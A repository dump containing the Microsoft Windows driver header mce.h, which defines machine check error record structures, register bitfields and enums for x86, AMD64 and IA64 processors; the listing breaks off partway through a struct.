https://raw.githubusercontent.com/idea4good/AbuCoding/cbb8f51b0d864e902f17ae2073fcb7376928dd47/source/meltdown/winDriver/kernelDriver.sys -------------------------------------------------------------------------------- /source/meltdown/winDriver/mce.h: -------------------------------------------------------------------------------- 1 | /*++ BUILD Version: 0011 // Increment this if a change has global effects 2 | 3 | Copyright (c) 1991-2001 Microsoft Corporation 4 | 5 | Module Name: 6 | 7 | mce.h 8 | 9 | Abstract: 10 | 11 | This header file defines the Machine Check Errors definitions. 12 | 13 | Author: 14 | 15 | Revision History: 16 | 17 | Creation: 04-Apr-2001 18 | 19 | --*/ 20 | 21 | #ifndef _MCE_ 22 | #define _MCE_ 23 | 24 | #pragma once 25 | 26 | #if _MSC_VER >= 1200 27 | #pragma warning(push) 28 | #pragma warning(disable:4201) // nonstandard extension used : nameless struct/union 29 | #pragma warning(disable:4214) // nonstandard extension used : bit field types other then int 30 | #endif 31 | 32 | // 33 | // HalMcaLogInformation 34 | // 35 | 36 | typedef enum { 37 | HAL_MCE_RECORD, 38 | HAL_MCA_RECORD 39 | } MCA_EXCEPTION_TYPE; 40 | 41 | #if defined(_X86_) || defined(_IA64_) || defined(_AMD64_) 42 | 43 | // 44 | // ADDR register for each MCA bank 45 | // 46 | 47 | typedef union _MCI_ADDR{ 48 | struct { 49 | ULONG Address; 50 | ULONG Reserved; 51 | } DUMMYSTRUCTNAME; 52 | 53 | ULONGLONG QuadPart; 54 | } MCI_ADDR, *PMCI_ADDR; 55 | 56 | 57 | #if defined(_AMD64_) 58 | 59 | // 60 | // STATUS register for each MCA bank. 61 | // 62 | 63 | #if (NTDDI_VERSION <= NTDDI_WINXP) 64 | typedef union _MCI_STATS { 65 | struct { 66 | USHORT McaCod; 67 | USHORT ModelErrorCode; 68 | ULONG OtherInfo : 25; 69 | ULONG Damage : 1; 70 | ULONG AddressValid : 1; 71 | ULONG MiscValid : 1; 72 | ULONG Enabled : 1; 73 | ULONG Uncorrected : 1; 74 | ULONG OverFlow : 1; 75 | ULONG Valid : 1; 76 | } MciStatus; 77 | 78 | ULONG64 QuadPart; 79 | } MCI_STATS, *PMCI_STATS; 80 | #else 81 | typedef union _MCI_STATS { 82 | struct { 83 | USHORT McaErrorCode; 84 | USHORT ModelErrorCode; 85 | ULONG OtherInformation : 25; 86 | ULONG ContextCorrupt : 1; 87 | ULONG AddressValid : 1; 88 | ULONG MiscValid : 1; 89 | ULONG ErrorEnabled : 1; 90 | ULONG UncorrectedError : 1; 91 | ULONG StatusOverFlow : 1; 92 | ULONG Valid : 1; 93 | } MciStatus; 94 | 95 | ULONG64 QuadPart; 96 | } MCI_STATS, *PMCI_STATS; 97 | #endif 98 | 99 | #endif // _AMD64_ 100 | 101 | #if defined(_X86_) 102 | 103 | // 104 | // STATUS register for each MCA bank. 105 | // 106 | 107 | typedef union _MCI_STATS { 108 | struct { 109 | USHORT McaCod; 110 | USHORT MsCod; 111 | ULONG OtherInfo : 25; 112 | ULONG Damage : 1; 113 | ULONG AddressValid : 1; 114 | ULONG MiscValid : 1; 115 | ULONG Enabled : 1; 116 | ULONG UnCorrected : 1; 117 | ULONG OverFlow : 1; 118 | ULONG Valid : 1; 119 | } MciStats; 120 | 121 | ULONGLONG QuadPart; 122 | 123 | } MCI_STATS, *PMCI_STATS; 124 | 125 | #endif // _X86_ 126 | 127 | // 128 | // MCA exception log entry 129 | // Defined as a union to contain MCA specific log or Pentium style MCE info. 130 | // 131 | 132 | #define MCA_EXTREG_V2MAX 24 // X86: Max. Number of extended registers 133 | 134 | #if defined(_X86_) || defined(_AMD64_) 135 | 136 | #if (NTDDI_VERSION >= NTDDI_WINXP) 137 | typedef struct _MCA_EXCEPTION { 138 | 139 | // Begin Version 1 stuff 140 | ULONG VersionNumber; // Version number of this record type 141 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE 142 | LARGE_INTEGER TimeStamp; // exception recording timestamp 143 | ULONG ProcessorNumber; 144 | ULONG Reserved1; 145 | 146 | union { 147 | struct { 148 | UCHAR BankNumber; 149 | UCHAR Reserved2[7]; 150 | MCI_STATS Status; 151 | MCI_ADDR Address; 152 | ULONGLONG Misc; 153 | } Mca; 154 | 155 | struct { 156 | ULONGLONG Address; // physical addr of cycle causing the error 157 | ULONGLONG Type; // cycle specification causing the error 158 | } Mce; 159 | } u; 160 | // End Version 1 stuff 161 | 162 | // Begin Version 2 stuff 163 | ULONG ExtCnt; 164 | ULONG Reserved3; 165 | ULONGLONG ExtReg[MCA_EXTREG_V2MAX]; 166 | // End Version 2 stuff 167 | 168 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 169 | #else 170 | typedef struct _MCA_EXCEPTION { 171 | 172 | ULONG VersionNumber; // Version number of this record type 173 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE 174 | LARGE_INTEGER TimeStamp; // exception recording timestamp 175 | ULONG ProcessorNumber; 176 | ULONG Reserved1; 177 | 178 | union { 179 | struct { 180 | UCHAR BankNumber; 181 | UCHAR Reserved2[7]; 182 | MCI_STATS Status; 183 | MCI_ADDR Address; 184 | ULONGLONG Misc; 185 | } Mca; 186 | 187 | struct { 188 | ULONGLONG Address; // physical addr of cycle causing the error 189 | ULONGLONG Type; // cycle specification causing the error 190 | } Mce; 191 | } u; 192 | 193 | } MCA_EXCEPTION, *PMCA_EXCEPTION; 194 | #endif 195 | 196 | typedef MCA_EXCEPTION CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check 197 | typedef MCA_EXCEPTION CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error 198 | 199 | #if (NTDDI_VERSION >= NTDDI_WINXP) 200 | #define MCA_EXCEPTION_V1_SIZE FIELD_OFFSET(MCA_EXCEPTION, ExtCnt) 201 | #define MCA_EXCEPTION_V2_SIZE sizeof(struct _MCA_EXCEPTION) 202 | #endif 203 | 204 | #endif // _X86_ || _AMD64_ 205 | 206 | // 207 | // ERRORS: ERROR_SEVERITY definitions 208 | // 209 | // One day the MS compiler will support typed enums with type != int so this 210 | // type of enums (UCHAR, __int64) could be defined... 211 | // 212 | 213 | #if defined(_AMD64_) || defined(_IA64_) 214 | 215 | typedef UCHAR ERROR_SEVERITY, *PERROR_SEVERITY; 216 | 217 | typedef enum _ERROR_SEVERITY_VALUE { 218 | ErrorRecoverable = 0, 219 | ErrorFatal = 1, 220 | ErrorCorrected = 2, 221 | ErrorOthers = 3, // [3,...] values are reserved 222 | } ERROR_SEVERITY_VALUE; 223 | 224 | #endif 225 | 226 | #if defined(_IA64_) 227 | 228 | #if 0 229 | // FIXFIX: This should not be required for IA64. 230 | // 231 | // STATUS register for each MCA bank. 232 | // 233 | 234 | typedef union _MCI_STATS { 235 | struct { 236 | USHORT McaCod; 237 | USHORT MsCod; 238 | ULONG OtherInfo : 25; 239 | ULONG Damage : 1; 240 | ULONG AddressValid : 1; 241 | ULONG MiscValid : 1; 242 | ULONG Enabled : 1; 243 | ULONG UnCorrected : 1; 244 | ULONG OverFlow : 1; 245 | ULONG Valid : 1; 246 | } MciStats; 247 | 248 | ULONGLONG QuadPart; 249 | 250 | } MCI_STATS, *PMCI_STATS; 251 | 252 | #endif // 0 253 | 254 | // 255 | // IA64 ERRORS: ERROR_REVISION definitions 256 | // 257 | 258 | typedef union _ERROR_REVISION { 259 | USHORT Revision; // Major and Minor revision number of the record: 260 | struct { 261 | UCHAR Minor; // Byte0: Minor. 262 | UCHAR Major; // Byte1: Major. 263 | } DUMMYSTRUCTNAME; 264 | } ERROR_REVISION, *PERROR_REVISION; 265 | 266 | // For Info: 267 | #if (NTDDI_VERSION > NTDDI_WINXP) 268 | #define ERROR_MAJOR_REVISION_SAL_03_00 0 269 | #define ERROR_MINOR_REVISION_SAL_03_00 2 270 | #define ERROR_REVISION_SAL_03_00 { ERROR_MINOR_REVISION_SAL_03_00, \ 271 | ERROR_MAJOR_REVISION_SAL_03_00 } 272 | 273 | // 274 | // Section Header revision is fixed at Major == 2 and Minor == 0 275 | // 276 | #define ERROR_FIXED_SECTION_REVISION { 2,\ 277 | 0 } 278 | #else 279 | #define ERROR_REVISION_SAL_03_00 { 2, 0 } 280 | #endif 281 | 282 | // 283 | // IA64 ERRORS: ERROR_TIMESTAMP definitions 284 | // 285 | 286 | typedef union _ERROR_TIMESTAMP { 287 | ULONGLONG TimeStamp; 288 | struct { 289 | UCHAR Seconds; // Byte0: Seconds 290 | UCHAR Minutes; // Byte1: Minutes 291 | UCHAR Hours; // Byte2: Hours 292 | UCHAR Reserved; // Byte3: Reserved 293 | UCHAR Day; // Byte4: Day 294 | UCHAR Month; // Byte5: Month 295 | UCHAR Year; // Byte6: Year 296 | UCHAR Century; // Byte7: Century 297 | } DUMMYSTRUCTNAME; 298 | } ERROR_TIMESTAMP, *PERROR_TIMESTAMP; 299 | 300 | // 301 | // IA64 ERRORS: ERROR_GUID definitions 302 | // 303 | 304 | typedef struct _ERROR_GUID { 305 | ULONG Data1; 306 | USHORT Data2; 307 | USHORT Data3; 308 | UCHAR Data4[8]; 309 | } ERROR_GUID, *PERROR_GUID; 310 | 311 | // 312 | // IA64 ERRORS: ERROR GUIDs definitions 313 | // 314 | 315 | typedef ERROR_GUID _ERROR_DEVICE_GUID; 316 | typedef _ERROR_DEVICE_GUID ERROR_DEVICE_GUID, *PERROR_DEVICE_GUID; 317 | 318 | typedef ERROR_GUID _ERROR_PLATFORM_GUID; 319 | typedef _ERROR_PLATFORM_GUID ERROR_PLATFORM_GUID, *PERROR_PLATFORM_GUID; 320 | 321 | // 322 | // IA64 ERRORS: ERROR_RECORD_HEADER definitions 323 | // 324 | 325 | typedef union _ERROR_RECORD_VALID { 326 | UCHAR Valid; 327 | struct { // Bits 328 | UCHAR OemPlatformID:1; // 0: OEM Platform Id is present in the record header 329 | UCHAR Reserved:7; // 1-7: Reserved 330 | } DUMMYSTRUCTNAME; 331 | } ERROR_RECORD_VALID, *PERROR_RECORD_VALID; 332 | 333 | typedef struct _ERROR_RECORD_HEADER { // Offsets: 334 | ULONGLONG Id; // 0: Unique identifier 335 | ERROR_REVISION Revision; // 8: Major and Minor revision number of the record 336 | ERROR_SEVERITY ErrorSeverity; // 10: Error Severity 337 | ERROR_RECORD_VALID Valid; // 11: Validation bits 338 | ULONG Length; // 12: Length of this record in bytes, including the header 339 | ERROR_TIMESTAMP TimeStamp; // 16: Timestamp recorded when event occurred 340 | UCHAR OemPlatformId[16]; // 24: Unique platform identifier. OEM defined. 341 | } ERROR_RECORD_HEADER, *PERROR_RECORD_HEADER; 342 | 343 | // 344 | // IA64 ERRORS: ERROR_SECTION_HEADER definitions 345 | // 346 | 347 | typedef union _ERROR_RECOVERY_INFO { 348 | UCHAR RecoveryInfo; 349 | struct { // Bits: 350 | UCHAR Corrected:1; // 0: Corrected 351 | UCHAR NotContained:1; // 1: Containment Warning 352 | UCHAR Reset:1; // 2: Reset 353 | UCHAR Reserved:4; // 6-3: Reserved 354 | UCHAR Valid:1; // 7: Valid Recovery Information 355 | } DUMMYSTRUCTNAME; 356 | } ERROR_RECOVERY_INFO, *PERROR_RECOVERY_INFO; 357 | 358 | typedef struct _ERROR_SECTION_HEADER { 359 | ERROR_DEVICE_GUID Guid; // Unique identifier 360 | ERROR_REVISION Revision; // Major and Minor revision number of the section 361 | ERROR_RECOVERY_INFO RecoveryInfo; // Recovery Information 362 | UCHAR Reserved; 363 | ULONG Length; // Length of this error device section in bytes, 364 | // including the header. 365 | } ERROR_SECTION_HEADER, *PERROR_SECTION_HEADER; 366 | 367 | // 368 | // IA64 Machine Check Error Logs: 369 | // WMI requires processor LID being stored in the Log. 370 | // This LID corresponds to the processor on which the SAL_PROC was executed on. 371 | // 372 | // TEMPTEMP: Implementation is temporary, until we implement HAL SW Error Section. 373 | // Note that the current FW builds do not update the _ERROR_PROCESSOR.CRLid field, 374 | // assuming there is a _ERROR_PROCESSOR section in the record. 375 | // 376 | 377 | #if !defined(__midl) && defined(_MSC_EXTENSIONS) 378 | __inline 379 | USHORT 380 | GetFwMceLogProcessorNumber( 381 | PERROR_RECORD_HEADER Log 382 | ) 383 | { 384 | PERROR_SECTION_HEADER section = (PERROR_SECTION_HEADER)((ULONG64)Log + sizeof(*Log)); 385 | USHORT lid = (USHORT)((UCHAR)(section->Reserved)); 386 | lid |= (USHORT)((UCHAR)(Log->TimeStamp.Reserved) << 8); 387 | return( lid ); 388 | } // GetFwMceLogProcessorNumber() 389 | #endif // !__midl 390 | 391 | // 392 | // IA64 ERRORS: ERROR_PROCESSOR device definitions 393 | // 394 | // The MCA architecture supports five different types of error reporting functional units 395 | // with the associated error records and its error severity. 396 | // At any point in time, a processor could encounter an MCA/CMC event due to errors detected 397 | // in one or more of the following units: 398 | // - Cache Check 399 | // - TLB Check 400 | // - Bus Check 401 | // - Register File 402 | // - Micro Architectural 403 | // 404 | // Terminology: 405 | // 406 | // - Target Address: 407 | // 64-bit integer containing the physical address where the data was to be delivered or 408 | // obtained. This could also be the incoming address for external snoops and TLB shoot-downs. 409 | // 410 | // - Requester Identifier: 411 | // 64-bit integer specifying the bus agent that generated the transaction responsible for 412 | // the Machine Check event. 413 | // 414 | // - Responder Identifier: 415 | // 64-bit integer specifying the bus agent that responded to a transaction responsible for 416 | // the Machine Check event. 417 | // 418 | // - Precise Instruction Pointer: 419 | // 64-bit integer specifying the virtual address that points to the IA-64 bundle that 420 | // contained the instruction responsible for the Machine Check event. 421 | // 422 | 423 | #define ERROR_PROCESSOR_GUID \ 424 | { 0xe429faf1, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }} 425 | 426 | typedef union _ERROR_MODINFO_VALID { 427 | ULONGLONG Valid; 428 | struct { // Bits 429 | ULONGLONG CheckInfo: 1; // 0: 430 | ULONGLONG RequestorIdentifier: 1; // 1: 431 | ULONGLONG ResponderIdentifier: 1; // 2: 432 | ULONGLONG TargetIdentifier: 1; // 3: 433 | ULONGLONG PreciseIP: 1; // 4: 434 | ULONGLONG Reserved: 59; // 5-63: 435 | } DUMMYSTRUCTNAME; 436 | } ERROR_MODINFO_VALID, *PERROR_MODINFO_VALID; 437 | 438 | typedef enum _ERROR_CHECK_IS { 439 | isIA64 = 0, 440 | isIA32 = 1, 441 | } ERROR_CHECK_IS; 442 | 443 | typedef enum _ERROR_CACHE_CHECK_OPERATION { 444 | CacheUnknownOp = 0, 445 | CacheLoad = 1, 446 | CacheStore = 2, 447 | CacheInstructionFetch = 3, 448 | CacheDataPrefetch = 4, 449 | CacheSnoop = 5, 450 | CacheCastOut = 6, 451 | CacheMoveIn = 7, 452 | } ERROR_CACHE_CHECK_OPERATION; 453 | 454 | typedef enum _ERROR_CACHE_CHECK_MESI { 455 | CacheInvalid = 0, 456 | CacheHeldShared = 1, 457 | CacheHeldExclusive = 2, 458 | CacheModified = 3, 459 | } ERROR_CACHE_CHECK_MESI; 460 | 461 | #if (NTDDI_VERSION >= NTDDI_VISTA) 462 | typedef union _ERROR_CACHE_CHECK { 463 | ULONGLONG CacheCheck; 464 | struct 465 | { 466 | ULONGLONG Operation:4; // bits 0- 3: Cache operation 467 | ULONGLONG Level:2; // 4- 5: Cache Level 468 | ULONGLONG Reserved1:2; // 6- 7 469 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line 470 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line 471 | ULONGLONG DataCache:1; // 10 : Failure in data cache 472 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache 473 | ULONGLONG MESI:3; // 12-14: 474 | ULONGLONG MESIValid:1; // 15 : MESI field is valid 475 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache 476 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid 477 | ULONGLONG Reserved2:1; // 22 478 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning 479 | ULONGLONG Reserved3:8; // 24-31 480 | ULONGLONG Index:20; // 32-51: Index of cache line 481 | ULONGLONG Reserved4:2; // 52-53 482 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 483 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 484 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 485 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 486 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 487 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 488 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 489 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 490 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 491 | } DUMMYSTRUCTNAME; 492 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK; 493 | # else 494 | typedef union _ERROR_CACHE_CHECK { 495 | ULONGLONG CacheCheck; 496 | struct 497 | { 498 | ULONGLONG Operation:4; // bits 0- 3: Cache operation 499 | ULONGLONG Level:2; // 4- 5: Cache Level 500 | ULONGLONG Reserved1:2; // 6- 7 501 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line 502 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line 503 | ULONGLONG DataCache:1; // 10 : Failure in data cache 504 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache 505 | ULONGLONG MESI:3; // 12-14: 506 | ULONGLONG MESIValid:1; // 15 : MESI field is valid 507 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache 508 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid 509 | ULONGLONG Reserved2:10; // 22-31 510 | ULONGLONG Index:20; // 32-51: Index of cache line 511 | ULONGLONG Reserved3:2; // 52-53 512 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 513 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 514 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 515 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 516 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 517 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 518 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 519 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 520 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 521 | } DUMMYSTRUCTNAME; 522 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK; 523 | #endif 524 | 525 | typedef enum _ERROR_TLB_CHECK_OPERATION { 526 | TlbUnknownOp = 0, 527 | TlbAccessWithLoad = 1, 528 | TlbAccessWithStore = 2, 529 | TlbAccessWithInstructionFetch = 3, 530 | TlbAccessWithDataPrefetch = 4, 531 | TlbShootDown = 5, 532 | TlbProbe = 6, 533 | TlbVhptFill = 7, 534 | TlbPurge = 8, 535 | } ERROR_TLB_CHECK_OPERATION; 536 | 537 | typedef union _ERROR_TLB_CHECK { 538 | ULONGLONG TlbCheck; 539 | struct 540 | { 541 | ULONGLONG TRSlot:8; // bits 0- 7: Slot number of Translation Register 542 | ULONGLONG TRSlotValid:1; // 8 : TRSlot field is valid 543 | ULONGLONG Reserved1:1; // 9 544 | ULONGLONG Level:2; // 10-11: TLB Level 545 | ULONGLONG Reserved2:4; // 12-15 546 | ULONGLONG DataTransReg:1; // 16 : Error in data translation register 547 | ULONGLONG InstructionTransReg:1; // 17 : Error in instruction translation register 548 | ULONGLONG DataTransCache:1; // 18 : Error in data translation cache 549 | ULONGLONG InstructionTransCache:1; // 19 : Error in instruction translation cache 550 | ULONGLONG Operation:4; // 20-23: Operation 551 | ULONGLONG Reserved3:30; // 24-53 552 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 553 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 554 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 555 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 556 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 557 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 558 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 559 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 560 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 561 | } DUMMYSTRUCTNAME; 562 | } ERROR_TLB_CHECK, *PERROR_TLB_CHECK; 563 | 564 | typedef enum _ERROR_BUS_CHECK_OPERATION { 565 | BusUnknownOp = 0, 566 | BusPartialRead = 1, 567 | BusPartialWrite = 2, 568 | BusFullLineRead = 3, 569 | BusFullLineWrite = 4, 570 | BusWriteBack = 5, 571 | BusSnoopProbe = 6, 572 | BusIncomingPtcG = 7, 573 | BusWriteCoalescing = 8, 574 | } ERROR_BUS_CHECK_OPERATION; 575 | 576 | #if (NTDDI_VERSION >= NTDDI_VISTA) 577 | typedef union _ERROR_BUS_CHECK { 578 | ULONGLONG BusCheck; 579 | struct 580 | { 581 | ULONGLONG Size:5; // bits 0- 4: Transaction size 582 | ULONGLONG Internal:1; // 5 : Internal bus error 583 | ULONGLONG External:1; // 6 : External bus error 584 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer 585 | ULONGLONG Type:8; // 8-15: Transaction type 586 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific 587 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy 588 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning 589 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific 590 | ULONGLONG Reserved1:22; // 32-53 591 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 592 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 593 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 594 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 595 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 596 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 597 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 598 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 599 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 600 | } DUMMYSTRUCTNAME; 601 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK; 602 | #else 603 | typedef union _ERROR_BUS_CHECK { 604 | ULONGLONG BusCheck; 605 | struct 606 | { 607 | ULONGLONG Size:5; // bits 0- 4: Transaction size 608 | ULONGLONG Internal:1; // 5 : Internal bus error 609 | ULONGLONG External:1; // 6 : External bus error 610 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer 611 | ULONGLONG Type:8; // 8-15: Transaction type 612 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific 613 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy 614 | ULONGLONG Reserved1:1; // 23 615 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific 616 | ULONGLONG Reserved2:22; // 32-53 617 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 618 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 619 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 620 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 621 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 622 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 623 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 624 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 625 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 626 | } DUMMYSTRUCTNAME; 627 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK; 628 | #endif 629 | 630 | typedef enum _ERROR_REGFILE_CHECK_IDENTIFIER { 631 | RegFileUnknownId = 0, 632 | GeneralRegisterBank1 = 1, 633 | GeneralRegisterBank0 = 2, 634 | FloatingPointRegister = 3, 635 | BranchRegister = 4, 636 | PredicateRegister = 5, 637 | ApplicationRegister = 6, 638 | ControlRegister = 7, 639 | RegionRegister = 8, 640 | ProtectionKeyRegister = 9, 641 | DataBreakPointRegister = 10, 642 | InstructionBreakPointRegister = 11, 643 | PerformanceMonitorControlRegister = 12, 644 | PerformanceMonitorDataRegister = 13, 645 | } ERROR_REGFILE_CHECK_IDENTIFIER; 646 | 647 | typedef enum _ERROR_REGFILE_CHECK_OPERATION { 648 | RegFileUnknownOp = 0, 649 | RegFileRead = 1, 650 | RegFileWrite = 2, 651 | } ERROR_REGFILE_CHECK_OPERATION; 652 | 653 | typedef union _ERROR_REGFILE_CHECK { 654 | ULONGLONG RegFileCheck; 655 | struct 656 | { 657 | ULONGLONG Identifier:4; // bits 0- 3: Register file identifier 658 | ULONGLONG Operation:4; // 4- 7: Operation that causes the MC event 659 | ULONGLONG RegisterNumber:7; // 8-14: Register number responsible for MC event 660 | ULONGLONG RegisterNumberValid:1; // 15 : Register number field is valid 661 | ULONGLONG Reserved1:38; // 16-53 662 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 663 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 664 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 665 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 666 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 667 | ULONGLONG Reserved2:3; // 60-62 668 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 669 | } DUMMYSTRUCTNAME; 670 | } ERROR_REGFILE_CHECK, *PERROR_REGFILE_CHECK; 671 | 672 | #if (NTDDK_VERSION <= WINXP) 673 | typedef enum _ERROR_MS_CHECK_OPERATION { 674 | MsUnknownOp = 0, 675 | MsReadOrLoad = 1, 676 | MsWriteOrStore = 2 677 | } ERROR_MS_CHECK_OPERATION; 678 | #else 679 | typedef enum _ERROR_MS_CHECK_OPERATION { 680 | MsUnknownOp = 0, 681 | MsReadOrLoad = 1, 682 | MsWriteOrStore = 2, 683 | MsOverTemperature = 3, 684 | MsNormalTemperature = 4 685 | } ERROR_MS_CHECK_OPERATION; 686 | #endif 687 | 688 | typedef union _ERROR_MS_CHECK { 689 | ULONGLONG MsCheck; 690 | struct 691 | { 692 | ULONGLONG StructureIdentifier:5; // bits 0- 4: Structure Identifier - impl. specific 693 | ULONGLONG Level:3; // 5- 7: Structure Level where error was generated 694 | ULONGLONG ArrayId:4; // 8-11: Identification of the array 695 | ULONGLONG Operation:4; // 12-15: Operation 696 | ULONGLONG Way:6; // 16-21: Way where the error was located 697 | ULONGLONG WayValid:1; // 22 : Way field is valid 698 | ULONGLONG IndexValid:1; // 23 : Index field is valid 699 | ULONGLONG Reserved1:8; // 24-31 700 | ULONGLONG Index:8; // 32-39: Index where the error was located 701 | ULONGLONG Reserved2:14; // 40-53 702 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction 703 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid 704 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction 705 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid 706 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected 707 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid 708 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid 709 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid 710 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid 711 | } DUMMYSTRUCTNAME; 712 | } ERROR_MS_CHECK, *PERROR_MS_CHECK; 713 | 714 | typedef union _ERROR_CHECK_INFO { 715 | ULONGLONG CheckInfo; 716 | ERROR_CACHE_CHECK CacheCheck; 717 | ERROR_TLB_CHECK TlbCheck; 718 | ERROR_BUS_CHECK BusCheck; 719 | ERROR_REGFILE_CHECK RegFileCheck; 720 | ERROR_MS_CHECK MsCheck; 721 | } ERROR_CHECK_INFO, *PERROR_CHECK_INFO; 722 | 723 | // SAL Specs July 2000: The size of _ERROR_MODINFO will always be 48 Bytes. 724 | 725 | typedef struct _ERROR_MODINFO { 726 | ERROR_MODINFO_VALID Valid; 727 | ERROR_CHECK_INFO CheckInfo; 728 | ULONGLONG RequestorId; 729 | ULONGLONG ResponderId; 730 | ULONGLONG TargetId; 731 | ULONGLONG PreciseIP; 732 | } ERROR_MODINFO, *PERROR_MODINFO; 733 | 734 | typedef union _ERROR_PROCESSOR_VALID { 735 | ULONGLONG Valid; 736 | struct { // Bits 737 | ULONGLONG ErrorMap: 1; // 0: 738 | ULONGLONG StateParameter: 1; // 1: 739 | ULONGLONG CRLid: 1; // 2: 740 | ULONGLONG StaticStruct:1; // 3: Processor Static Info error. 741 | ULONGLONG CacheCheckNum:4; // 4-7: Cache errors. 742 | ULONGLONG TlbCheckNum:4; // 8-11: Tlb errors. 743 | ULONGLONG BusCheckNum:4; // 12-15: Bus errors. 744 | ULONGLONG RegFileCheckNum:4; // 16-19: Registers file errors. 745 | ULONGLONG MsCheckNum:4; // 20-23: Micro-Architecture errors. 746 | ULONGLONG CpuIdInfo:1; // 24: CPUID Info. 747 | ULONGLONG Reserved:39; // 25-63: Reserved. 748 | 